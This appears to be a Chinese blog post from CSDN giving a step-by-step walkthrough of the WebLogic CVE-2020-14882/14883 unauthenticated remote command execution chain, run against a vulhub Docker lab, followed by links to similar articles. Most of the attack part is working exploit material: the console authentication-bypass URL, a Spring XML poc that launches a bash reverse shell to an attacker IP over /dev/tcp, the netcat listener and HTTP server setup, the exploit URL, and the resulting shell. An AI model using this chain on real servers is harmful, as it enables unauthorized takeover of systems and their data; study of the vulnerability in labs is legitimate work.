WebLogic: CVE-2020-14882/14883【getshell】

已于 2024-07-31 11:47:26 修改
阅读量1k 收藏 10
点赞数 21
文章标签: 安全 web安全
于 2024-07-31 08:46:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h1008685/article/details/140812300
版权
记录第一次getshell公网设备

漏洞介绍

CVE-2020-14882:允许 未授权 的用户绕过管理控制台 (Console)的权限验证访问后台
CVE-2020-14883:允许后台任意用户通过HTTP协议 执行任意命令
使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令
漏洞原理:https://xz.aliyun.com/t/8470

环境搭建

1.进入靶场目录

cd /vulhub-master/weblogic/CVE-2020-14882

2.开启靶场【报错重启docker服务】


[root@localhost CVE-2020-14882]# docker-compose up -d

Starting cve-2020-14882_weblogic_1 ... done
 

3.查看靶场端口

[root@localhost CVE-2020-14882]# docker ps

CONTAINER ID   IMAGE                                             COMMAND                  CREATED         STATUS                           PORTS                                                          NAMES
480b96ac8c82   vulhub/weblogic:12.2.1.3-2018   "/u01/oracle/createA…"   2 minutes ago   Up About a minute   0.0.0.0:7001->7001/tcp, :::7001->7001/tcp   cve-2020-14882_weblogic_1
 

4. 访问靶场

http://192.168.10.5:7001/

漏洞利用

1. 输入网址查看是否存在未授权访问

http://192.168.10.5:7001/console/css/%252e%252e%252fconsole.port
al?_nfpb=true&_pageLabel=JmsSAFAgentSAFAgentTablePage&handle=co
m.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_d
omain%2CType%3DDomain%22%29
没有登录的情况下可直接进入后台

2.编写poc

poc.xml

<beans xmlns="http://www.springframework.org/schema/beans" 
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
       xsi:schemaLocation="http://www.springframework.org/schema/beans 
       http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>/bin/bash</value>
                <value>-c</value>
                <value><![CDATA[bash -i &> /dev/tcp/192.168.10.128/5555 0<&1]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>
 

3. 攻击机开启http服务并访问

┌──(root㉿kali)-[~]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

4.监听本机 5555 端口

┌──(root㉿kali)-[~]
└─# nc -lvp 5555
listening on [any] 5555 ...
 

5.访问url

http://192.168.10.5:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://192.168.10.128:8888/poc.xml")

6.建立反弹链接

┌──(root㉿kali)-[~]
└─# nc -lvp 5555
listening on [any] 5555 ...
192.168.10.5: inverse host lookup failed: Unknown host
connect to [192.168.10.128] from (UNKNOWN) [192.168.10.5] 58624
bash: no job control in this shell
[oracle@480b96ac8c82 base_domain]$ ls
 

Zeddm
关注
  • 21
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-14882 WebLogic远程代码执行漏洞复现
千寻的博客
12-17 1万+
Weblogic简介 WebLogic Server是美国Oracle公司的主要产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场上主要的Java(J2EE)应用服务器软件之一。 漏洞描述 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞(CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 We
cve_2020_14883.zip
05-28
weblogic 解决CVE-2020-14883漏洞
Weblogic Unauthentication Remote Command Execution (CVE-2020-14882, CVE-2020-14883)
黑白的博客
12-06 460
声明 好好学习,天天向上 漏洞描述 Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882CVE-2020-14883CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的
Weblogic漏洞(CVE-2020-14882/-14883
最新发布
qq_68186313的博客
08-06 228
使⽤这两个漏洞链,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执⾏任 意命令并完全控制主机。CVE-2020-14883 允许经过身份验证的⽤户在管理员控制台组件上执⾏任何命令。CVE-2020-14882 允许远程⽤户绕过管理员控制台组件中的身份验证。3、访问以下URL,连接第二个漏洞(CVE-2020-14883)4、进入docker,看到命令成功运行。2、使⽤以下url绕过登录认证。
CVE-2020-14883验证
weixin_39811856的博客
11-10 3414
[CVE-2020-14883] Oracle WebLogic Server认证的远程代码执行(RCE) 基于windows的受攻击对象:tangosol.coherence.mvel2.sh.ShellSession() POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1 Host: vulnerablehost:7001 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 ..
WeblogicCVE-2020-14882CVE-2020-14883) 管理控制台未授权远程命令执行漏洞
god_Zeo的安全博客
11-02 6183
WeblogicCVE-2020-14882CVE-2020-14883) 管理控制台未授权远程命令执行漏洞 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞,该漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Co
weblogic权限绕过CVE-2020-14482&远程命令执行漏洞CVE-2020-14883
weixin_44912035的博客
01-02 898
漏洞危害 CVE-2020-14882:远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic 管理控制台。 CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个HTTP请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。 影响版本 Weblogic : 10.3.6.0.0 Weblogic : 12.1.3.0.0 Weblogic : 12.2.1.3.0 Weblogic : 12.2.1.4.0
K8 weblogic-CVE-2018-2628-getshell
07-16
【K8 weblogic-CVE-2018-2628-getshell】是一个针对Oracle WebLogic Server的渗透测试工具,主要用于检验系统是否存在CVE-2018-2628漏洞并利用该漏洞获取shell权限。这个工具的使用应该严格限制在合法的安全测试环境...
WebLogic未授权命令执行漏洞(CVE-2020-14882-14883)
m0_48520508的博客
11-10 8297
0x00简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 Weblogic对比Tomcat 0x01漏洞概述 CVE-2020-14882: 代码执行漏洞 远程攻击者可以构造特殊的HTTP请求,在未经身份
Weblogic权限绕过之CVE-2020-14882利用和源码分析
weixin_45682070的博客
03-25 6641
前言: 环境: 利用: 代码分析: 鉴权代码分析: CVE-2020-14882是权限绕过漏洞,所以我们直接切入主题,找到鉴权的代码,在idea中双击shift,查找doSecuredExecute方法。 此方法存在于\middleware\wlserver\modules\com.oracle.weblogic.servlet.jar!\weblogic\servlet\internal\WebAppServletContext.classWebAppServletContext类,可以看到中间有个se
复现nuclei——CVE-2020-14882WebLogic远程代码执行漏洞)
记录并分享学习安全的知识点..
01-21 2053
一、漏洞介绍 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞(CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 WebLogic Server Console ,并执行任意代码。 二、影响版本 WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLo
CVE-2020-14882​&14883Weblogic RCE复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编
weblogic-CVE-2020-14882CVE-2020-14883
jjxsir的博客
05-20 446
2020年10月的更新中,Oracle官方修复了两个安全漏洞,分别是CVE-2020-14882CVE-2020-14883CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类。依旧显示404页面,进容器里面看看命令是否执行。
CVE-2020-14882~14883(Weblogic RCE)
include_heqile的博客
11-23 476
https://mp.weixin.qq.com/s?__biz=MzkzNTA0NzgyMA==&mid=2247483787&idx=1&sn=9406a10d2f78d20c1dc57b0cf98618db&chksm=c2b2a668f5c52f7e386c84f9e22379e7d4a3e7ee470e07427c4327555d98af7d7f5c103bf353&token=517092499&lang=zh_CN#rd
Weblogic未授权访问漏洞-CVE-2020-14882&&CVE-2020-14883
weixin_51151498的博客
12-05 1640
weblogic漏洞复现
Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882CVE-2020-14883
weixin_45653478的博客
05-14 1102
Weblogic Pre-Auth Remote Command Execution 漏洞(CVE-2020-14882, CVE-2020-14883)是针对 Oracle WebLogic Server 的两个安全漏洞。CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证,而 CVE-2020-14883 则允许经过身份验证的用户在管理员控制台组件上执行任意命令。
weblogic权限绕过/远程命令执行漏洞复现(CVE-2020-14482、CVE-2020-14883
LuckySec
12-03 7334
0x01 漏洞简介 Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882CVE-2020-14883CVE-2020-14882:远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic 管理控制台。 CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个HTTP请求
weblogic权限绕过远程命令执行漏洞复现(CVE-2020-14482、CVE-2020-14883
又菜又爱倒腾的博客
10-29 2326
#weblogic权限绕过/远程命令执行漏洞(CVE-2020-14482、CVE-2020-14883) # 一、漏洞简介 Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882CVE-2020-14883CVE-2020-14882:远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic 管理控制台。 CVE-2020-14
Weblogic RCE漏洞CVE-2020-14882&14883:复现与影响版本解析
近期,两个关键性漏洞 CVE-2020-14882CVE-2020-14883 被发现,这些漏洞的存在使得未经授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值